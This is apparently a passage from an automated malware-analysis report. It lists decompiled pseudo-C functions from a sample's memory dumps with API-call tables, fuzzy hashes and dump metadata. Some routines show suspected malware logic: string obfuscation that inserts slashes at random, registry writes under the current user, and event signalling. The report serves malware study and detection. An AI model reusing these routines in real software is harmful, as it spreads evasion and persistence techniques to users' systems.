                                                                                                            • API String ID: 1384045349-0
                                                                                                            • Opcode ID: 3a15674fe1360c87d04afa97441156d49c37df8709f9e57c413d792701f91831
                                                                                                            • Instruction ID: 2d0d78d5ca723a82be8ec1214a7b011d69785de88f297db904585521070fc0e0
                                                                                                            • Opcode Fuzzy Hash: 3a15674fe1360c87d04afa97441156d49c37df8709f9e57c413d792701f91831
                                                                                                            • Instruction Fuzzy Hash: B7412AB5D00258DFDB10CFA4C940BEDBBB4BB48318F1086ADE419A7281EB755A44CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 40%
                                                                                                            			E03032107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                            				intOrPtr _v12;
                                                                                                            				void* _v16;
                                                                                                            				void* _v28;
                                                                                                            				char _v32;
                                                                                                            				void* __esi;
                                                                                                            				void* _t29;
                                                                                                            				void* _t38;
                                                                                                            				signed int* _t39;
                                                                                                            				void* _t40;
                                                                                                            
                                                                                                            				_t36 = __ecx;
                                                                                                            				_v32 = 0;
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				_v12 = _a4;
                                                                                                            				_t38 = E03033946(__ecx,  &_v32);
                                                                                                            				if(_t38 != 0) {
                                                                                                            					L12:
                                                                                                            					_t39 = _a8;
                                                                                                            					L13:
                                                                                                            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                            						_t16 =  &(_t39[1]); // 0x5
                                                                                                            						_t23 = _t16;
                                                                                                            						if( *_t16 != 0) {
                                                                                                            							E030365EA(_t23);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _t38;
                                                                                                            				}
                                                                                                            				if(E030337AC(0x40,  &_v16) != 0) {
                                                                                                            					_v16 = 0;
                                                                                                            				}
                                                                                                            				_t40 = CreateEventA(0x303d2e4, 1, 0,  *0x303d384);
                                                                                                            				if(_t40 != 0) {
                                                                                                            					SetEvent(_t40);
                                                                                                            					Sleep(0xbb8);
                                                                                                            					CloseHandle(_t40);
                                                                                                            				}
                                                                                                            				_push( &_v32);
                                                                                                            				if(_a12 == 0) {
                                                                                                            					_t29 = E030324BE(_t36);
                                                                                                            				} else {
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_t29 = E0303282B(_t36);
                                                                                                            				}
                                                                                                            				_t41 = _v16;
                                                                                                            				_t38 = _t29;
                                                                                                            				if(_v16 != 0) {
                                                                                                            					E030351BB(_t41);
                                                                                                            				}
                                                                                                            				if(_t38 != 0) {
                                                                                                            					goto L12;
                                                                                                            				} else {
                                                                                                            					_t39 = _a8;
                                                                                                            					_t38 = E03037CC7( &_v32, _t39);
                                                                                                            					goto L13;
                                                                                                            				}
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(0303D2E4,00000001,00000000,00000040,00000001,?,747DF710,00000000,747DF730,?,?,?,0303555B,?,00000001,?), ref: 03032158
                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,0303555B,?,00000001,?,00000002,?,?,030353C9,?), ref: 03032165
                                                                                                            • Sleep.KERNEL32(00000BB8,?,?,?,0303555B,?,00000001,?,00000002,?,?,030353C9,?), ref: 03032170
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,0303555B,?,00000001,?,00000002,?,?,030353C9,?), ref: 03032177
                                                                                                              • Part of subcall function 030324BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,03032197,?,03032197,?,?,?,?,?,03032197,?), ref: 03032598
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559942907-0
                                                                                                            • Opcode ID: 12fb5aa95307ab59e6c6fdc4056a613f7c6e215445785fbe8aadc41b8132194e
                                                                                                            • Instruction ID: 2e8b73a1e1a94e47c2bddbd6023b0f34815b838ebf07c8d534f964669b6b2dcf
                                                                                                            • Opcode Fuzzy Hash: 12fb5aa95307ab59e6c6fdc4056a613f7c6e215445785fbe8aadc41b8132194e
                                                                                                            • Instruction Fuzzy Hash: D721A477902219ABDB20FFE8C9C49EEB7BDEF5A350B054825EB11E7104D734D9458BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20187fc068aa1d6eafe1208ce3af4e85800c3a5198542934036cc17ca26899b6
                                                                                                            • Instruction ID: a8d966861df632d730dbf183b2819ac0cc1416276cebc654d93da1d5f5b4266b
                                                                                                            • Opcode Fuzzy Hash: 20187fc068aa1d6eafe1208ce3af4e85800c3a5198542934036cc17ca26899b6
                                                                                                            • Instruction Fuzzy Hash: 5821B772A49625EBEB224A798C44B4E77E89F437B4F513211FD55AB281F630FD00E5E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E030322D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				void* _v12;
                                                                                                            				void* _v16;
                                                                                                            				intOrPtr _t26;
                                                                                                            				intOrPtr* _t28;
                                                                                                            				intOrPtr _t31;
                                                                                                            				intOrPtr* _t32;
                                                                                                            				void* _t39;
                                                                                                            				int _t46;
                                                                                                            				intOrPtr* _t47;
                                                                                                            				int _t48;
                                                                                                            
                                                                                                            				_t47 = __eax;
                                                                                                            				_push( &_v12);
                                                                                                            				_push(__eax);
                                                                                                            				_t39 = 0;
                                                                                                            				_t46 = 0;
                                                                                                            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                            				_v8 = _t26;
                                                                                                            				if(_t26 < 0) {
                                                                                                            					L13:
                                                                                                            					return _v8;
                                                                                                            				}
                                                                                                            				if(_v12 == 0) {
                                                                                                            					Sleep(0xc8);
                                                                                                            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                            				}
                                                                                                            				if(_v8 >= _t39) {
                                                                                                            					_t28 = _v12;
                                                                                                            					if(_t28 != 0) {
                                                                                                            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                            						_v8 = _t31;
                                                                                                            						if(_t31 >= 0) {
                                                                                                            							_t46 = lstrlenW(_v16);
                                                                                                            							if(_t46 != 0) {
                                                                                                            								_t46 = _t46 + 1;
                                                                                                            								_t48 = _t46 + _t46;
                                                                                                            								_t39 = E030375F6(_t48);
                                                                                                            								if(_t39 == 0) {
                                                                                                            									_v8 = 0x8007000e;
                                                                                                            								} else {
                                                                                                            									memcpy(_t39, _v16, _t48);
                                                                                                            								}
                                                                                                            								__imp__#6(_v16);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t32 = _v12;
                                                                                                            						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                            					}
                                                                                                            					 *_a4 = _t39;
                                                                                                            					 *_a8 = _t46 + _t46;
                                                                                                            				}
                                                                                                            				goto L13;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1198164300-0
                                                                                                            • Opcode ID: ca616810cb78766bb07de54f82e526d47a1b472cdd5b3221b756d87a0c1b479c
                                                                                                            • Instruction ID: 6f82ec16922c49297f252ef8c70207dbe967e19d5e59043fedb1a8c612a3bd9f
                                                                                                            • Opcode Fuzzy Hash: ca616810cb78766bb07de54f82e526d47a1b472cdd5b3221b756d87a0c1b479c
                                                                                                            • Instruction Fuzzy Hash: 3C216079902209FFCB11DFA8C8849DEBBFCFF49200B144569E941E7200E730DA04CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                            • _free.LIBCMT ref: 6F08F2FB
                                                                                                            • _free.LIBCMT ref: 6F08F331
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2283115069-0
                                                                                                            • Opcode ID: b17d0e65e532aba36f15f605098d49146fb13c2326fa3e70311ce71eb5e2df46
                                                                                                            • Instruction ID: e7a97c44f1a1549d0ac0b7558e3954f24a32ed56941c58a1bdb6254c12d50cde
                                                                                                            • Opcode Fuzzy Hash: b17d0e65e532aba36f15f605098d49146fb13c2326fa3e70311ce71eb5e2df46
                                                                                                            • Instruction Fuzzy Hash: F711E97630AF026EDF1116749D84FAF339D9BC22BEB642225F5349B1C1FF219816A150
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F3F5
                                                                                                            • _free.LIBCMT ref: 6F08F452
                                                                                                            • _free.LIBCMT ref: 6F08F488
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F493
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2283115069-0
                                                                                                            • Opcode ID: 248d955f71a801132fc3f5126a5b5ebd8414a16dd3941e3cc1b60f10ffa1f15f
                                                                                                            • Instruction ID: e40a6ca78ecbda4efc4bfb607370b5500c4b2238d107eb0c6ffcfd882e16a32a
                                                                                                            • Opcode Fuzzy Hash: 248d955f71a801132fc3f5126a5b5ebd8414a16dd3941e3cc1b60f10ffa1f15f
                                                                                                            • Instruction Fuzzy Hash: BA11087630AB012EEF1116788C80F6F379DABC627AB643236F938871D1FF709815A160
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F05039A
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503A6
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503B2
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503C1
                                                                                                            • task.LIBCPMTD ref: 6F04F87F
                                                                                                            • task.LIBCPMTD ref: 6F04F88B
                                                                                                            • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6F04F8A0
                                                                                                            • task.LIBCPMTD ref: 6F04F8B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                            • String ID:
                                                                                                            • API String ID: 2520070614-0
                                                                                                            • Opcode ID: 74c0039afd9be9bfa277b7155dd36234673c2a6c548d30854eb7c63d77806f22
                                                                                                            • Instruction ID: bf56e73db4866b691eb5a8ccfe326f073bd6e53e3ab3b285d7326b4ee54391d8
                                                                                                            • Opcode Fuzzy Hash: 74c0039afd9be9bfa277b7155dd36234673c2a6c548d30854eb7c63d77806f22
                                                                                                            • Instruction Fuzzy Hash: F121FAB1D0024CEBCB04DFE4C950BDEBBB9FB48318F148169E519AB294DB346A05CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F05039A
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503A6
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503B2
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503C1
                                                                                                            • task.LIBCPMTD ref: 6F04F95F
                                                                                                            • task.LIBCPMTD ref: 6F04F96B
                                                                                                            • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6F04F980
                                                                                                            • task.LIBCPMTD ref: 6F04F998
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                            • String ID:
                                                                                                            • API String ID: 2520070614-0
                                                                                                            • Opcode ID: b3009ac81ca725c6cab0f473ad8ec12e5ea4852f7e29343459120d45f6100cd4
                                                                                                            • Instruction ID: 0fe950cc1a9682c1630a68a0c49881135a487e06b5c87e33bdca215bcca96361
                                                                                                            • Opcode Fuzzy Hash: b3009ac81ca725c6cab0f473ad8ec12e5ea4852f7e29343459120d45f6100cd4
                                                                                                            • Instruction Fuzzy Hash: 2921F8B1D0424CEBCB04DFE4C950BDEBBB9BF48318F108169E529AB294DB356A05CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 68%
                                                                                                            			E030326DD(unsigned int __eax, void* __ecx) {
                                                                                                            				void* _v8;
                                                                                                            				void* _v12;
                                                                                                            				signed int _t21;
                                                                                                            				signed short _t23;
                                                                                                            				char* _t27;
                                                                                                            				void* _t29;
                                                                                                            				void* _t30;
                                                                                                            				unsigned int _t33;
                                                                                                            				void* _t37;
                                                                                                            				unsigned int _t38;
                                                                                                            				void* _t41;
                                                                                                            				void* _t42;
                                                                                                            				int _t45;
                                                                                                            				void* _t46;
                                                                                                            
                                                                                                            				_t42 = __eax;
                                                                                                            				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                            				_t38 = __eax;
                                                                                                            				_t30 = RtlAllocateHeap( *0x303d270, 0, (__eax >> 3) + __eax + 1);
                                                                                                            				_v12 = _t30;
                                                                                                            				if(_t30 != 0) {
                                                                                                            					_v8 = _t42;
                                                                                                            					do {
                                                                                                            						_t33 = 0x18;
                                                                                                            						if(_t38 <= _t33) {
                                                                                                            							_t33 = _t38;
                                                                                                            						}
                                                                                                            						_t21 =  *0x303d288; // 0x69ef8f4c
                                                                                                            						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                            						 *0x303d288 = _t23;
                                                                                                            						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                            						memcpy(_t30, _v8, _t45);
                                                                                                            						_v8 = _v8 + _t45;
                                                                                                            						_t27 = _t30 + _t45;
                                                                                                            						_t38 = _t38 - _t45;
                                                                                                            						_t46 = _t46 + 0xc;
                                                                                                            						 *_t27 = 0x2f;
                                                                                                            						_t13 = _t27 + 1; // 0x1
                                                                                                            						_t30 = _t13;
                                                                                                            					} while (_t38 > 8);
                                                                                                            					memcpy(_t30, _v8, _t38 + 1);
                                                                                                            				}
                                                                                                            				return _v12;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03031A07,00000000,?,?,03034653,?,053195B0), ref: 030326E8
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 03032700
                                                                                                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,03031A07,00000000,?,?,03034653,?,053195B0), ref: 03032744
                                                                                                            • memcpy.NTDLL(00000001,?,00000001), ref: 03032765
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1819133394-0
                                                                                                            • Opcode ID: 1cd24c51c9008e8b4a4e4b628b04c13eb7cc45233634a8ecf7c5f0220583ce7e
                                                                                                            • Instruction ID: 7ad19985a6cc6850a07224fc2155809f8ec64e15a3ce6451c00bcbd068a8bedd
                                                                                                            • Opcode Fuzzy Hash: 1cd24c51c9008e8b4a4e4b628b04c13eb7cc45233634a8ecf7c5f0220583ce7e
                                                                                                            • Instruction Fuzzy Hash: E0112576A02214BFD714DA69DC88E9EBBFEEBD5260B090276F504D7240E6749E0497A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 64%
                                                                                                            			E03035AB2(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                            				intOrPtr _v36;
                                                                                                            				intOrPtr _v44;
                                                                                                            				intOrPtr _v48;
                                                                                                            				intOrPtr _v52;
                                                                                                            				void _v60;
                                                                                                            				char _v64;
                                                                                                            				intOrPtr _t18;
                                                                                                            				intOrPtr _t19;
                                                                                                            				intOrPtr _t26;
                                                                                                            				intOrPtr _t27;
                                                                                                            				long _t28;
                                                                                                            
                                                                                                            				_t27 = __edi;
                                                                                                            				_t26 = _a8;
                                                                                                            				_t28 = E03031A9C(_a4, _t26, __edi);
                                                                                                            				if(_t28 != 0) {
                                                                                                            					memset( &_v60, 0, 0x38);
                                                                                                            					_t18 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					_t28 = 0;
                                                                                                            					_v64 = 0x3c;
                                                                                                            					if(_a12 == 0) {
                                                                                                            						_t7 = _t18 + 0x303e4e8; // 0x70006f
                                                                                                            						_t19 = _t7;
                                                                                                            					} else {
                                                                                                            						_t6 = _t18 + 0x303e8f0; // 0x750072
                                                                                                            						_t19 = _t6;
                                                                                                            					}
                                                                                                            					_v52 = _t19;
                                                                                                            					_push(_t28);
                                                                                                            					_v48 = _a4;
                                                                                                            					_v44 = _t26;
                                                                                                            					_v36 = _t27;
                                                                                                            					E030334C7();
                                                                                                            					_push( &_v64);
                                                                                                            					if( *0x303d0e4() == 0) {
                                                                                                            						_t28 = GetLastError();
                                                                                                            					}
                                                                                                            					_push(1);
                                                                                                            					E030334C7();
                                                                                                            				}
                                                                                                            				return _t28;
                                                                                                            			}















                                                                                                            APIs
                                                                                                              • Part of subcall function 03031A9C: SysAllocString.OLEAUT32(00000000), ref: 03031AF6
                                                                                                              • Part of subcall function 03031A9C: SysAllocString.OLEAUT32(0070006F), ref: 03031B0A
                                                                                                              • Part of subcall function 03031A9C: SysAllocString.OLEAUT32(00000000), ref: 03031B1C
                                                                                                            • memset.NTDLL ref: 03035AD5
                                                                                                            • GetLastError.KERNEL32 ref: 03035B21
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: AllocString$ErrorLastmemset
                                                                                                            • String ID: <$@MxtNxt
                                                                                                            • API String ID: 3736384471-3662781078
                                                                                                            • Opcode ID: 6a85c476a99afc87691c2be8eeda54f6bd44b131a87dadb595350623f49c98bd
                                                                                                            • Instruction ID: b069be1ff6ec0c12812c10110fe2f0bc001708e9b27971293d15f577129f1aca
                                                                                                            • Opcode Fuzzy Hash: 6a85c476a99afc87691c2be8eeda54f6bd44b131a87dadb595350623f49c98bd
                                                                                                            • Instruction Fuzzy Hash: B3012975902218ABDB51EFA4DC84EDEBBFCAB4A640F044526F908EB250D774D9018BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051E36
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051E43
                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6F051E80
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FCD
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FF1
                                                                                                            • std::exception::exception.LIBCMTD ref: 6F051EA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                            • String ID:
                                                                                                            • API String ID: 2425033533-0
                                                                                                            • Opcode ID: 068de06cd81252e7670178095b09e314b0f514ddc13a0911309fed16d92a2d3a
                                                                                                            • Instruction ID: 16ea2ed692671786158aa57e3f411c0664fcb135a78c689c6fc0a7f567fc5b0b
                                                                                                            • Opcode Fuzzy Hash: 068de06cd81252e7670178095b09e314b0f514ddc13a0911309fed16d92a2d3a
                                                                                                            • Instruction Fuzzy Hash: C8018C71905754DECB309FAA858078BFEE0BF28214B50896FE58E87A41C771A510CBAA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03034450() {
                                                                                                            				void* _t1;
                                                                                                            				intOrPtr _t5;
                                                                                                            				void* _t6;
                                                                                                            				void* _t7;
                                                                                                            				void* _t11;
                                                                                                            
                                                                                                            				_t1 =  *0x303d2a4; // 0x2ec
                                                                                                            				if(_t1 == 0) {
                                                                                                            					L8:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				SetEvent(_t1);
                                                                                                            				_t11 = 0x7fffffff;
                                                                                                            				while(1) {
                                                                                                            					SleepEx(0x64, 1);
                                                                                                            					_t5 =  *0x303d2f4; // 0x0
                                                                                                            					if(_t5 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t11 = _t11 - 0x64;
                                                                                                            					if(_t11 > 0) {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					break;
                                                                                                            				}
                                                                                                            				_t6 =  *0x303d2a4; // 0x2ec
                                                                                                            				if(_t6 != 0) {
                                                                                                            					CloseHandle(_t6);
                                                                                                            				}
                                                                                                            				_t7 =  *0x303d270; // 0x4f20000
                                                                                                            				if(_t7 != 0) {
                                                                                                            					HeapDestroy(_t7);
                                                                                                            				}
                                                                                                            				goto L8;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(000002EC,00000001,0303191C), ref: 0303445B
                                                                                                            • SleepEx.KERNEL32(00000064,00000001), ref: 0303446A
                                                                                                            • CloseHandle.KERNEL32(000002EC), ref: 0303448B
                                                                                                            • HeapDestroy.KERNEL32(04F20000), ref: 0303449B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4109453060-0
                                                                                                            • Opcode ID: 2ac6182c1ddcfe8e2bf050b5267e12d2d176b33335ff7d8f3a4c791421be0128
                                                                                                            • Instruction ID: 2c1480b89419610ba80581b1aefad36375d31796a7d1f5f18e989b55b0324ad6
                                                                                                            • Opcode Fuzzy Hash: 2ac6182c1ddcfe8e2bf050b5267e12d2d176b33335ff7d8f3a4c791421be0128
                                                                                                            • Instruction Fuzzy Hash: 51F06572B073129BEF20FB36E98CB4236ECEB15761B090520BC04EB988DF2CC404C660
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID: -
                                                                                                            • API String ID: 269201875-2547889144
                                                                                                            • Opcode ID: ff46db10ad3bf996c822c11df43c6b2d41a6a45196c34a87bd487786654de76e
                                                                                                            • Instruction ID: dd04d97c3ded2eb6ea598c02f791702432311bcdef09cb612bdcde9900f5b201
                                                                                                            • Opcode Fuzzy Hash: ff46db10ad3bf996c822c11df43c6b2d41a6a45196c34a87bd487786654de76e
                                                                                                            • Instruction Fuzzy Hash: 65C1D271A042159BDF24DF64CC50BEEB3F9FF15718F5064AAD819AB180FB31AA81EB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303117A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                            				struct _FILETIME _v12;
                                                                                                            				void* _t11;
                                                                                                            				short _t19;
                                                                                                            				void* _t22;
                                                                                                            				void* _t24;
                                                                                                            				void* _t25;
                                                                                                            				short* _t26;
                                                                                                            
                                                                                                            				_t24 = __edx;
                                                                                                            				_t25 = E03031922(_t11, _a12);
                                                                                                            				if(_t25 == 0) {
                                                                                                            					_t22 = 8;
                                                                                                            				} else {
                                                                                                            					_t26 = _t25 + _a16 * 2;
                                                                                                            					 *_t26 = 0;
                                                                                                            					_t22 = E03039371(__ecx, _a4, _a8, _t25);
                                                                                                            					if(_t22 == 0) {
                                                                                                            						GetSystemTimeAsFileTime( &_v12);
                                                                                                            						_t19 = 0x5f;
                                                                                                            						 *_t26 = _t19;
                                                                                                            						_t22 = E03034A6D(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                                                                                            					}
                                                                                                            					HeapFree( *0x303d270, 0, _t25);
                                                                                                            				}
                                                                                                            				return _t22;
                                                                                                            			}











                                                                                                            APIs
                                                                                                              • Part of subcall function 03031922: lstrlen.KERNEL32(?,00000000,05319B38,00000000,030374FF,05319D16,?,?,?,?,?,69B25F44,00000005,0303D00C), ref: 03031929
                                                                                                              • Part of subcall function 03031922: mbstowcs.NTDLL ref: 03031952
                                                                                                              • Part of subcall function 03031922: memset.NTDLL ref: 03031964
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,05319364), ref: 030311B2
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,05319364), ref: 030311E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                            • String ID: Uxt
